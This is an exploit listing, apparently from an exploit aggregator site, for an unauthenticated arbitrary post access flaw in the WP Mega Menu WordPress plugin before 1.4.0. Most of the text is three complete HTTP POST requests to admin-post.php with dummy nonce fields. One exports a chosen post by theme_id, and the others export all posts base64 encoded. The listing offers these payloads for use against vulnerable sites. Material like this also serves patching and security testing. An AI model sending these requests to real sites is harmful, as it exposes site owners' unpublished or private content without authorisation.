Exploit for WP Mega Menu < 1.4.0 - Unauthenticated Arbitrary Post Access

Name: Exploit for WP Mega Menu < 1.4.0 - Unauthenticated Arbitrary Post Access
Rating: 5 (332 reviews)

2021-09-21 | CVSS 0.5

## https://sploitus.com/exploit?id=WPEX-ID:E40D8099-31AC-448E-9AD4-2D931A114A30
Access an Arbitrary Post (post ID is via the theme_id):

POST /wp-admin/admin-post.php?action=export_wpmm_theme&theme_id=1055 HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close

wpmmm_save_new_theme_nonce_field=dummy


Access All posts at once (result is base64 encoded) in version < 1.3.9

POST /wp-admin/admin-post.php?action=wp_megamenu_nav_export&menu=1 HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 34
Connection: close

wpmmm_nav_export_nonce_field=dummy


Access All posts at once (result is base64 encoded), in version <= 1.3.9:

POST /wp-admin/admin-post.php?action=wp_megamenu_nav_export&menu=1 HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Connection: close

wpmmm_nav_export_nonce_field=aa&wpmmm_save_new_theme_nonce_field=b